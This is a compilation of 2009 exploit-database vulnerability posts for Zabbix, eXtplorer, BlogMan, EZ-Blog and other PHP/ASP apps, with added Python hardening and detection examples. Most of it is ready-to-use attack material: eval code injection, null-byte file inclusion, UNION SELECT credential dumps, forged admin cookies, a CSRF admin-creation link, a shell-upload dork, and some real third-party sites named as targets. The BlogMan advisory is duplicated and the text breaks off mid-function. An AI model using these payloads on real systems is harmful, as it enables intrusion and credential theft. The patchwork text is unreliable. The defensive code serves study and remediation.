Investigating calc_exp2()'s source:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
function calc_exp2($fields,$field,$expression){
    foreach($fields as $f => $checks){
        $expression = str_replace('{'.$f.'}','$_REQUEST["'.$f.'"]',$expression);
    }
    $expression = trim($expression,"& ");
    $exec = "return (".$expression.") ? 1 : 0;";
    $ret = eval($exec);
    return $ret;
}
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
We have reached a function that calls eval() on the "$exec" variable,
which contains user-controlled data.
To better understand how the executed string is composed we need a
suitable page. Thanks to "locales.php" we can reach this function
without any authentication.
Now if we try to execute the query:
/locales.php?download&langTo&extlang[AAA]=1
The value of $exec is the following:
return (($_REQUEST["extlang"]["AAA"]!='')) ? 1 : 0;
Some constraints exist: the injected payload must satisfy calc_exp()'s
requirements in order to reach calc_exp2(), and the resulting string
must be syntactically correct PHP. What we can do is play with the key
values of the array. An intermediate test was:
/locales.php?download&langTo&extlang[AAA"];phpinfo();]=1
But it generates a syntax error. After some thought the problem was
solved in this way:
/locales.php?download&langTo&extlang[".phpinfo()."]=1
Now the syntax is correct and the payload gets executed.
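The string construction traced above, as an added example that is not part of the advisory or of Zabbix's code: it reproduces in Python how calc_exp() and calc_exp2() assemble the statement handed to eval(), and adds the whitelist check on request keys that the original lacks. NOT_EMPTY expanding to "({}!='')" is an assumption taken from the traced $exec string; SAFE_KEY_RE is a hypothetical policy.

```python
import re

# Assumption: Zabbix's NOT_EMPTY validation macro expands to "({}!='')",
# which is what the advisory's traced $exec string for "extlang" implies.
NOT_EMPTY_EXPR = "({}!='')"

# Hypothetical whitelist for field names and array keys: the check that
# check_fields() lacks before splicing request data into eval()'d code.
SAFE_KEY_RE = re.compile(r"[A-Za-z0-9_]+")


def build_exec_string(field, key, expression):
    """Mirror of the string building in calc_exp() and calc_exp2().

    "{}" becomes $_REQUEST["field"]["key"] (the array branch of calc_exp),
    the result is trimmed of "& " as calc_exp2() does, and finally wrapped
    in the "return (...) ? 1 : 0;" statement that calc_exp2() eval()s.
    """
    expr = expression.replace("{}", '$_REQUEST["%s"]["%s"]' % (field, key))
    expr = expr.strip("& ")
    return "return (%s) ? 1 : 0;" % expr


def is_safe_key(key):
    """True only for keys that cannot close the double-quoted PHP literal."""
    return SAFE_KEY_RE.fullmatch(key) is not None


def build_exec_string_hardened(field, key, expression):
    """Same construction, but returns None instead of a statement whenever
    the field name or the array key fails the whitelist."""
    if not is_safe_key(field) or not is_safe_key(key):
        return None
    return build_exec_string(field, key, expression)


def flag_request_keys(keys):
    """Detection helper: the request keys a log review or WAF rule should
    flag, i.e. those carrying quote, dot or parenthesis characters."""
    return [k for k in keys if not is_safe_key(k)]
```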
B) Cross Site Request Forgery
A CSRF vulnerability exists in file "users.php". If the admin visits the
following link:
/users.php?config=0&save&alias=alias&name=foo&surname=foo&user_type=3&
lang=lang&theme=theme&autologout=0&url=url&refresh=0
A user with admin permissions is created.
C) Local File Inclusion
If the user is authenticated, a Local File Inclusion vulnerability
exists in file "locales.php".
The following URL exploits this vulnerability:
/locales.php?action=1&next=1&srclang=../validate&extlang=en
The string ".inc.php" is automatically appended to the local file
path. Despite that, it is possible to include any target file by
truncating the filename with a null byte:
/locales.php?next=1&srclang=../../../../../../../var/log/apache2/error_log%22
Null byte injection normally requires magic quotes off.
The vulnerable code is the following:
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
'srclang'=> array(T_ZBX_STR, O_OPT, NULL, NOT_EMPTY, 'isset({next})'),
[...]
else if(isset($_REQUEST['next'])){
[...]
$fileFrom = 'include/locales/'.$_REQUEST['srclang'].".inc.php";
if(file_exists($fileFrom)){
include($fileFrom);
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
IV. DETECTION
Zabbix 1.6.2 and possibly earlier versions are vulnerable.
V. WORKAROUND
Update Zabbix from the SVN server (svn://svn.zabbix.com) or download
version 1.6.3 when available.
VI. VENDOR RESPONSE
Vendor will fix all the exposed vulnerabilities in Zabbix 1.6.3.
VII. CVE INFORMATION
No CVE at this time.
VIII. DISCLOSURE TIMELINE
20081215 Bug discovered
20090116 Initial vendor contact
20090116 Vendor Response (Fixes will be included in Zabbix 1.6.3)
20090130 Second email (When this is going to be fixed?)
20090131 Vendor Response (Everything has been fixed a week ago and is
publicly available in the SVN, Zabbix 1.6.3 will be released
within 10-15 days)
20090220 Third email (20 days elapsed and no response, we will release
on 23 Feb)
20090220 Vendor Response (Postpone of 5-10 days required)
20090220 Third email (We will wait 5-10 days, 2 March is the deadline
if no contact)
20090303 Forced Advisory Release
IX. CREDIT
Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni
"evilaliv3" Pellerano are credited with the discovery of this
vulnerability.
Antonio "s4tan" Parata
web site: http://www.ictsc.it/
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it
Giovanni "evilaliv3" Pellerano
web site: http://www.evilaliv3.org
mail: giovanni.pellerano AT evilaliv3 DOT org
X. LEGAL NOTICES
Copyright (c) 2009 Francesco "ascii" Ongaro
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
# milw0rm
Joomla/Mambo Component eXtplorer Code Execution Vulnerability
INTERNET SECURITY AUDITORS ALERT 2009-002
- Original release date: January 7th, 2009
- Last revised: March 2nd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 9/10 (CVSS scored)
I. VULNERABILITY
eXtplorer standalone & Joomla!/Mambo Remote Code Execution vulnerability
II. BACKGROUND
eXtplorer is a web-based file management component for all your needs.
It has a desktop-application-like interface with drag & drop, a grid and
a directory tree, and makes heavy use of the ExtJS JavaScript library.
It is widely used to access and modify the files and directories on
your server via FTP or direct file access.
It runs natively under Joomla! 1.5.x, 1.0.x and Mambo as a component and
can also be used as a standalone app. It is based on Quixplorer (available
at http://sourceforge.net/projects/quixplorer/). eXtplorer is released
under a dual license: the Mozilla Public License (MPL 1.1) and the GNU
General Public License (GNU/GPL).
III. DESCRIPTION
eXtplorer is prone to a local file include and directory traversal
vulnerability because the application fails to sufficiently sanitize
user-supplied input. The parameter 'lang' is not properly sanitized.
Since the application allows uploading files to the server, this could
be combined with the previous vulnerabilities to allow an attacker to
view any local file or execute arbitrary code remotely in the context
of the web server. This may aid in launching further attacks.
In order to perform the attack, an attacker could upload malicious PHP
code (the upload action is allowed by the application), then exploit a
bug to learn the full path of the recently uploaded local file (if the
'display_errors' directive is set to On), and then include it by
exploiting the local file include and directory traversal flaw (using
../../path/to/file) to finally execute the PHP code.
Successful exploitation of this flaw may aid in the compromise of the
server in the context of the web server.
The software is affected running standalone or as a Joomla!/Mambo
component.
IV. PROOF OF CONCEPT
The affected code:
File: include/init.php Line 100
$GLOBALS["language"] = $mainframe->getUserStateFromRequest(
'language', 'lang', $default_lang );
File: include/init.php Line: 145
// Necessary files
require_once( _EXT_PATH."/config/conf.php" );
if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"].".php")) {
require_once( _EXT_PATH."/languages/".$GLOBALS["language"].".php" ); <- HERE
} else {
require_once( _EXT_PATH."/languages/english.php" );
}
if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php")) {
require_once( _EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php" ); <- HERE
} else {
require_once( _EXT_PATH."/languages/english_mimes.php" );
}
The file include/init.php is included in every request to the application.
Here is a PoC:
PoC: http://site/path/?lang=../../path/to/maliciuos_uploaded_code
PoC: http://site/path/?lang=../../../../../etc/passwd
The bug can be exploited with or without 'magic_quotes_gpc', but note
that if magic_quotes_gpc is set to Off an attacker can view any file,
such as /etc/passwd, by appending a '\0' character; if it is On, only
PHP files can be included, which still allows executing any PHP code
the attacker wants. It is also possible to hide the crafted parameters
by sending them through the POST method, making detection more
difficult for the site administrator.
In order to successfully perform this attack the attacker must know the
full path where the files are uploaded, and it is easy to get by making
a request like this:
POST /path/index.php HTTP/1.1
Host: host
User-Agent: user-agent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://host/path
Content-Length: 80
Cookie: PHPSESSID=; eXtplorer=
Pragma: no-cache
Cache-Control: no-cache
start=0&limit=50&dir=x&option=com_extplorer&action=getdircontents&sendWhat=files
The response is a JSON file:
{"action":"","message":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","error":"\/var\/www\/path\/\/x : This directory
doesn\\'t exist.","success":false}
Sending "x", the application came back with "/var/www/path/x".
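The path handling at the root of both the Zabbix "locales.php" include (section C of the previous advisory) and the eXtplorer 'lang' include above, as an added example that belongs to neither advisory nor project: the unchecked concatenation both code excerpts show, beside a hardened builder that whitelists the name and verifies containment, plus a small detection helper for request logs. NAME_RE and the base directories are assumptions.

```python
import os
import re
from urllib.parse import parse_qsl

# Hypothetical whitelist: language and locale names are bare identifiers
# such as "en" or "english", never path fragments.
NAME_RE = re.compile(r"[A-Za-z0-9_]+")


def build_include_path(base_dir, name, suffix):
    """Path construction as both excerpts do it: the request value is
    concatenated as-is, so '..' segments and an embedded NUL survive."""
    return base_dir + "/" + name + suffix


def is_contained(base_dir, candidate):
    """True when the fully resolved candidate still lies under base_dir."""
    base = os.path.realpath(base_dir)
    resolved = os.path.realpath(candidate)
    # realpath() has collapsed every '..', so containment is a prefix test
    return os.path.commonpath([base, resolved]) == base


def safe_include_path(base_dir, name, suffix):
    """Hardened builder: reject NUL bytes and non-whitelisted names up front,
    then confirm containment.  Returns the resolved path, or None."""
    if "\x00" in name or NAME_RE.fullmatch(name) is None:
        return None
    candidate = os.path.join(os.path.realpath(base_dir), name + suffix)
    if not is_contained(base_dir, candidate):
        return None
    return os.path.realpath(candidate)


def flag_traversal_params(query_string):
    """Detection helper: names of query parameters carrying '..' or a NUL
    byte after URL decoding (so '%2e%2e' and '%00' are caught as well)."""
    flagged = []
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if ".." in value or "\x00" in value:
            flagged.append(name)
    return flagged
```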
V. BUSINESS IMPACT
An attacker could execute arbitrary code remotely and maybe gain
access to the operating system of the server.
VI. SYSTEMS AFFECTED
Versions prior to 2.0.0 of eXtplorer are vulnerable.
VII. SOLUTION
Upgrade to version 2.0.1 of eXtplorer. It can be downloaded from
http://extplorer.sourceforge.net
VIII. REFERENCES
http://extplorer.sf.net
IX. CREDITS
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
March 02, 2009: Initial release
XI. DISCLOSURE TIMELINE
January 07, 2009: eXtplorer contacted
January 15, 2009: eXtplorer release version 2.0.1
March 02, 2009: Vulnerability published
XII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
# milw0rm
Graugon PHP Article Publisher 1.0 (SQL/CH) Multiple Remote Vulnerabilities
[0x01] Informations:
Name : Graugon PHP Article Publisher 1.0
Download : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability : Multiple Sql Injections / Insecure Cookie Handling
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
[0x02] Bug:
Bugged Page: index.php [..] admin.php [..] view.php
[Code]
$c = $_GET['c'];
$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]
[code]
$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);
[/code]
[code]
$id = $_GET['id']; [..]
$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]
[0x03] Exploits:
Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
javascript:document.cookie ="g_admin=1; path=/"
# milw0rm
Access2asp imageLibrary Arbitrary ASP Shell Upload Vulnerability
[dork]
inurl:"default_Image.asp"
EXPLOITS:
http://www.site.com/imageLibrary//admin/images/default_Image.asp
[exp:]
http://www.davidhalpernmd.com/manage_tbps/default_Image.asp
[demo]
http://www.access2asp.com/imageLibraryDemo/admin/images/default_Image.asp
[shell be like ]
http://www.access2asp.com/imageLibraryDemo/admin/images/win.asp
Special Greetz for : www.sec-code.com
Greetz : MaTrEx & samkmk.almkkar & 3lo0osh & ili The General ili & Super-Code & BxH &all tryag members & all muslims
# milw0rm
Digital Interchange Calendar 5.7.13 Contents Change Vulnerability
Author : ByALBAYX
Website : WWW.C4TEAM.ORG
Country : Turkey
Script :Digital Interchange Calendar V. 5.7.13
S.Site :http://digitalinterchange.com
Dty :http://digitalinterchange.com/products/index.asp?iProductID=1
Price :$129.00
Vulnerability:
http://c4team.org/ [PATH] /admin/registration_options.asp
http://c4team.org/ [PATH] /admin/add_registration_option.asp
http://c4team.org/ [PATH] /admin/set_registration_option_status.asp
Vs....
Demo:
http://calendar.digitalinterchange.com
http://eeba.org/calendar
http://mema.state.md.us/calendar
http://iamu.org/calendar
http://usgbcutah.org/calendar
# milw0rm
Document Library 1.0.1 Arbitrary Change Admin Vulnerability
Author : ByALBAYX
Website : WWW.C4TEAM.ORG
Script :Document Library Version 1.0.1
S.Site :http://digitalinterchange.com
Dty :http://digitalinterchange.com/products/index.asp?iProductID=12
Demo :http://library.digitalinterchange.com
Price :$109.00
Vulnerability :
Update Admin Account Info
http://c4team.org/ [PATH] /admin/save_user.asp
Admin Username :Heykir
Admin Password :Heykir
Confirm Password :Heykir
Save
http://c4team.org/ [PATH] /admin/login.asp
Demo:
http://library.digitalinterchange.com/admin/save_user.asp
http://library.digitalinterchange.com/admin/login.asp
# milw0rm
EZ-Blog 1b Delete All Posts / SQL Injection Vulnerabilities
Application: EZ-Blog
http://sourceforge.net/projects/ez-blog/
Version: Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
This is a crazy application because it does not
require authentication for posting, deleting,
etc., and it is entirely vulnerable to SQL
Injection, as follows:
http://site/path/public/view.php?storyid=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10%23
There is no highly sensitive information in the
database, but it is possible to cause inconvenience.
The following injection allows deleting all
posts:
<form action="http://site/path/admin/remove.php" method="POST">
<input type="hidden" name="kill" value="1'or'1'='1">
<input type="hidden" name="confirm" value="1">
<input type="hidden" name="rm" value="true">
<input type="submit" value="Exploit">
</form>
# milw0rm
BlogMan 0.45 Multiple Remote Vulnerabilities
Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com
*************************************************
- BUGS
This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
    $id = $_COOKIE['blogmanuserid'];
    $query = "SELECT * FROM user WHERE UserID='".$id."'";
    $user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
    echo "<a href='edit.php?id=".$id."'>".$user['UserName']."</a>\n";
*/
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines are improperly checked:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/
Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.
The following information must be sent using
POST method to doLogin.php
un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The first value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid'
and inserting the value of a registered user id
into its content (often 1 for admin):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
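An added example, not code from either advisory, contrasting the cookie handling behind Graugon's g_admin cookie and BlogMan's blogmanuserid cookie (the cookie value is the identity, so any client can set it) with an HMAC-signed cookie that the server can verify. The secret and the user ids are constructed for the demonstration.

```python
import base64
import hashlib
import hmac

# Constructed secret for this demonstration only; a real deployment loads it
# from server-side configuration and never sends it to the client.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def user_from_unsigned_cookie(cookie_value):
    """The pattern both advisories describe: the cookie *is* the identity,
    so whoever sets blogmanuserid=1 (or g_admin=1) is trusted unchecked."""
    return int(cookie_value) if cookie_value.isdigit() else None


def _tag(payload, secret):
    """URL-safe base64 of HMAC-SHA256 over the payload."""
    digest = hmac.new(secret, payload.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode().rstrip("=")


def sign_user_cookie(user_id, secret=SERVER_SECRET):
    """Hardened form: the cookie carries the id plus an HMAC over it,
    so the id cannot be changed without the server-side secret."""
    payload = str(int(user_id))
    return payload + "." + _tag(payload, secret)


def user_from_signed_cookie(cookie_value, secret=SERVER_SECRET):
    """Return the user id only when the tag verifies; None for a bare id,
    a malformed value or any tampering with the id."""
    payload, sep, tag = cookie_value.rpartition(".")
    if not sep or not payload.isdigit():
        return None
    # constant-time comparison so the tag cannot be guessed byte by byte
    if not hmac.compare_digest(tag, _tag(payload, secret)):
        return None
    return int(payload)
```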
Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges using
a SQL Injection bug through a cookie.
The following lines are improperly checked:
/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
    echo "<meta equiv='refresh' content='0;index.php' /></head></html>";
} else {
    ...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
The first value is UserID and the last value
is UserCanAdmin.
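The string-built queries that run through this advisory, Graugon's and EZ-Blog's, beside their parameterized fix, as an added example that is not code from any of the advisories: an in-memory SQLite table with the column names the BlogMan excerpts use (values constructed) shows that the cookie-driven admin.php check accepts a row that never existed, while the bound-parameter version returns nothing. The comment syntax in the constructed input is SQLite's "--", not MySQL's "#".

```python
import sqlite3


def make_demo_db():
    """Constructed in-memory stand-in for the "user" table; column names
    follow the advisory, the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (UserID INTEGER, UserName TEXT, "
                 "UserPassword TEXT, UserCanAdmin INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?)",
                     [(1, "admin", "hash-of-admin", 1),
                      (2, "guest", "hash-of-guest", 0)])
    return conn


def lookup_user_vulnerable(conn, cookie_value):
    """Query assembled the way BlogMan's admin.php does it: the cookie
    value is spliced straight into the SQL text."""
    query = "SELECT * FROM user WHERE UserID='" + cookie_value + "'"
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, cookie_value):
    """Hardened form: the id is validated as an integer before it reaches
    the database and is passed as a bound parameter.  The same fix covers
    the unquoted numeric case (Graugon's id=$c and id=$id)."""
    if not cookie_value.isdigit():
        return []
    return conn.execute("SELECT * FROM user WHERE UserID = ?",
                        (int(cookie_value),)).fetchall()


def can_admin(rows):
    """What admin.php's test amounts to: the first row's UserCanAdmin."""
    return bool(rows) and bool(rows[0][3])
```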
# milw0rm
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com
*************************************************
- BUGS
This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
echo "
href='edit.php?id=".$id."'>".$user['UserName']."
\n";*/
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines are improperly checked:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/
Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.
The following information must be sent using
POST method to doLogin.php
un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The first value is UserID, the third value is UserPassword, the
tenth value is UserDisabled and the eleventh value is UserActive.
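The login bypass above, and the column counting behind the UNION payloads for index.php, read.php and profile.php, replayed as an added example. This is not Blogman's code: it rebuilds the quoted doLogin.php logic over an in-memory SQLite table, emulates MySQL's PASSWORD() and its '#' comment syntax, and places a parameterised version beside it. The 16-column layout is an assumption (the advisory only fixes positions 1, 2, 3, 10, 11 and 16; the Col* names are placeholders), as are the row values and the 's3cret' password.

```python
import hashlib
import sqlite3

# Assumed 16-column layout of the Blogman "user" table. Only the positions
# named in the advisory are real: 1 UserID, 2 UserName, 3 UserPassword,
# 10 UserDisabled, 11 UserActive, 16 UserCanAdmin. Col* are placeholders.
COLUMNS = (
    ["UserID", "UserName", "UserPassword"]
    + [f"Col{i}" for i in range(4, 10)]
    + ["UserDisabled", "UserActive"]
    + [f"Col{i}" for i in range(12, 16)]
    + ["UserCanAdmin"]
)
assert len(COLUMNS) == 16


def mysql_password(pw: str) -> str:
    """Emulate MySQL 4.1+ PASSWORD(): '*' + upper(hex(sha1(sha1(pw))))."""
    inner = hashlib.sha1(pw.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def new_db() -> sqlite3.Connection:
    """Constructed database with one administrator row (password 's3cret')."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.create_function("PASSWORD", 1, mysql_password)  # stand-in for the MySQL built-in
    db.execute(f"CREATE TABLE user ({', '.join(COLUMNS)})")
    row = [1, "admin", mysql_password("s3cret")] + [None] * 6 + [0, 1] + [None] * 4 + [1]
    db.execute(f"INSERT INTO user VALUES ({', '.join('?' * 16)})", row)
    return db


def strip_mysql_comment(sql: str) -> str:
    """MySQL treats '#' as a comment to end of line; SQLite does not, so emulate it."""
    return sql.split("#", 1)[0]


def vulnerable_login(db, un: str, pw: str):
    """The doLogin.php logic: string-concatenated queries. Returns UserID or None."""
    pw_hashed = db.execute(strip_mysql_comment(f"SELECT PASSWORD('{pw}')")).fetchone()[0]
    user_row = db.execute(
        strip_mysql_comment(f"SELECT * FROM user WHERE UserName='{un}'")
    ).fetchone()
    if user_row is None:
        return None
    if user_row["UserPassword"] == pw_hashed and user_row["UserActive"] and not user_row["UserDisabled"]:
        return user_row["UserID"]
    return None


def safe_login(db, un: str, pw: str):
    """Bound parameter: the attacker's quote and UNION stay inside the string value."""
    user_row = db.execute("SELECT * FROM user WHERE UserName = ?", (un,)).fetchone()
    if user_row is None:
        return None
    # The PASSWORD() comparison is kept to isolate the SQL fix; a full fix would
    # also move to a salted password hash (e.g. PHP's password_hash/password_verify).
    if user_row["UserPassword"] == mysql_password(pw) and user_row["UserActive"] and not user_row["UserDisabled"]:
        return user_row["UserID"]
    return None


# The exact 'un' value from the advisory: a forged row with UserID=1,
# UserPassword=PASSWORD('mypass'), UserDisabled=0 and UserActive=1.
PAYLOAD_UN = (
    "' UNION ALL SELECT "
    "1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#"
)
PAYLOAD_PW = "mypass"

if __name__ == "__main__":
    db = new_db()
    print("vulnerable:", vulnerable_login(db, PAYLOAD_UN, PAYLOAD_PW))  # 1: logged in as admin
    print("safe:      ", safe_login(db, PAYLOAD_UN, PAYLOAD_PW))        # None: no such user
```

The forged row works because `mysql_fetch_array` returns the first row of the result set and the UNION's second SELECT supplies one whose hash, active and disabled columns are attacker-chosen; with a bound parameter the whole payload is looked up as a username and nothing matches.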
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication system by creating
a cookie named 'blogmanuserid' whose content is the ID of a
registered user (usually 1 for the administrator):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges through the SQL injection
in the cookie, since admin.php trusts the UserCanAdmin column of
whatever row the query returns.
The following lines are improperly checked:
/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
echo "<meta http-equiv='refresh' content='0;index.php' /></head></html>";
} else {
...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
The first value is UserID and the last (sixteenth) value is
UserCanAdmin.
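Both cookie attacks above (the bare "blogmanuserid=1" forgery and the UNION payload that escalates to UserCanAdmin) rely on the cookie carrying a plain user id that is trusted and then concatenated into SQL. An added example of the check that closes both, not Blogman's code: the cookie carries an HMAC over the id, the id must be decimal before anything else happens, and the admin lookup takes the verified id as a bound parameter. SECRET_KEY, the helper names and the in-memory table are assumptions for illustration.

```python
import hashlib
import hmac
import secrets

# Assumed: a per-deployment key generated once and kept outside the web
# root. Generated at import here only so the example runs stand-alone.
SECRET_KEY = secrets.token_bytes(32)


def sign_user_id(user_id: int, key: bytes = SECRET_KEY) -> str:
    """Cookie value '<id>.<hex hmac>' where the tag covers the decimal id."""
    msg = str(int(user_id)).encode()
    tag = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return f"{msg.decode()}.{tag}"


def verify_user_id(cookie, key: bytes = SECRET_KEY):
    """Return the integer id if the tag matches, else None.

    Only a decimal id is accepted, so the advisory's
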